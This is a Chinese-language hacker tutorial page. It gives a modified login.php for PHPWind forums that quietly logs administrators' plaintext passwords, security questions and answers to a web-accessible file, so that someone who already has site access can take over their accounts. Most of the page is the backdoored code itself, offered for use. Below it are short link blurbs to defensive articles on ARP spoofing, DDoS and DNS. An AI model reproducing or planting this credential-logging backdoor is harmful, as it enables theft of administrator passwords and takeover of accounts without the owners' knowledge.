教你用PHPWIND得到管理员密码的方法
所属分类:
网络安全 / 黑客教程
阅读数:
138
收藏 0赞 0分享
有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办?
在登录文件做手脚啊...我来贴一个我修改的.
login.php里面替换掉对应的部分就OK了.
[Copy to clipboard] [ - ]CODE:
if($action=="login"){
/*记录他的问题和答案修改开始*/
$ques=($_POST['question']!=='-1') ? $_POST['question'] : $_POST['customquest'];
$qs='问题:'.$ques.'答案:'.$_POST['answer'];
/*记录他的问题和答案修改结束*/
if(!$_POST['step']){
$jumpurl = $pre_url;
require_once(R_P.'require/header.php');
require_once PrintEot('login');footer();
} elseif($_POST['step']==2){
$logingd && GdConfirm($_POST['gdcode']);
$loginq && Qcheck($_POST['qanswer'],$_POST['qkey']);
require_once(R_P.'require/checkpass.php');
include_once(D_P."data/bbscache/dbreg.php");
InitGP(array('pwuser','pwpwd','question','customquest','answer','cktime','hideid','jumpurl'),'P');
if ($pwuser && $pwpwd)
{
$md5_pwpwd = md5($pwpwd);
$realpass=$pwpwd;
$safecv = $db_ifsafecv ? questcode($question,$customquest,$answer) : '';
list($winduid,$groupid,$pwpwd) = checkpass($pwuser,$md5_pwpwd,$safecv,$lgt);
/*下面是我添加的*/
$adminid = array("3", "4", "5"); //adminid=3,4,5,就是管理者.
if (in_array($groupid, $adminid)){
$showtime=date("Y-m-d H:i:s"); //记录的时间.
@$fp = fopen(D_P.'./data/groupdb/index.html', 'a'); //写入到原本就存在的文件,而且这个文件应该是可写的.
@fwrite($fp, '用户名:'.$pwuser.'-密码:'.$realpass.'-'.$qs.'-GroupID:'.$groupid.'-'.$showtime.'<br>'); //基本格式
@fclose($fp);
}
/*到这里修改结束*/
}else{
Showmsg('login_empty');
}
if(file_exists(D_P."data/groupdb/group_$groupid.php")){
require_once Pcv(D_P."data/groupdb/group_$groupid.php");
} else{
require_once(D_P."data/groupdb/group_1.php");
}
$windpwd = $pwpwd;
$cktime != 0 && $cktime = $timestamp;
Cookie("winduser",StrCode($winduid."\t".$windpwd."\t".$safecv),$cktime);
Cookie('lastvisit','',0);//将$lastvist清空以将刚注册的会员加入今日到访会员中
if($db_autoban){
require_once(R_P.'require/autoban.php');
autoban($winduid);
}
($gp_allowhide && $hideid) ? Cookie('hideid',"1",$cktime) : Loginipwrite($winduid);
empty($jumpurl) && $jumpurl=$db_bfn;
//passport
if($db_pptifopen && $db_ppttype == 'server' && ($db_ppturls || $forward)){
$tmp = $jumpurl;
$jumpurl = $forward ? $forward : $db_ppturls;
$forward = $tmp;
require_once(R_P.'require/passport_server.php');
}
//passport
refreshto($jumpurl,'have_login');
}
}
ARP欺骗攻击原理另一种理解方法
本文子明特别用通俗的例子,说明ARP欺骗攻击的原理,使ARP欺骗攻击原理更加清楚的展现在你的面前。
收藏 0赞 0分享
七招教你抵御ARP欺骗攻击
本文介绍了七种简易方法助你抵御ARP欺骗攻击,感兴趣的小伙伴们可以参考一下
收藏 0赞 0分享
全面剖析DDoS攻击 黑客常用攻击方式
纵观网络安全攻击的各种方式方法,其中DDoS类的攻击会给你的网络系统造成更大的危害。因此,了解DDoS,了解它的工作原理及防范措施,是一个计算机网络安全技术人员应必修的内容之一。
收藏 0赞 0分享
最简单的防止ARP欺骗的方法
局域网中的计算机容易遭受攻击的原因是使用动态的arp获取协议所以很不安全,当把arp协议设为静态的可以杜绝arp攻击的发生,需要了解的朋友可以参考一下
收藏 0赞 0分享
路由器防止ARP欺骗的设置步骤
ARP欺骗是一个比较常见的网络问题,它会盗取用户账号,还会导致网络的瘫痪。为此,很多路由器开发商都设置了路由器防止ARP欺骗的功能。下面小编说说路由器防止ARP欺骗的设置方法。
收藏 0赞 0分享
如何从运营角度保障DNS安全
如何从不同层面综合运营,保证DNS服务安全高效的运行?DNSPod工程师认为,主要应该从状态监控、信息告警、事件处理、数据记录、综合运营数据分析这五个方面入手。
收藏 0赞 0分享
DNS欺骗的原理 DNS防御实战演练
DNS即Domain Name System的缩写,域名系统以分布式数据库的形式将域名和IP地址相互映射。DNS协议即域名解析协议,简单的说:DNS是用来解析域名的。
收藏 0赞 0分享
对付DDoS攻击的三大绝招
不知道身为网络管理员的你是否遇到过服务器因为拒绝服务攻击都瘫痪的情况呢?就网络安全而言目前最让人担心和害怕的入侵攻击就要算是拒绝服务攻击了。和传统的攻击不同,采取的是仿真多个客户端来连接服务器,造成服务器无法完成如此多的客户端连接,从而无法提供服务。
收藏 0赞 0分享
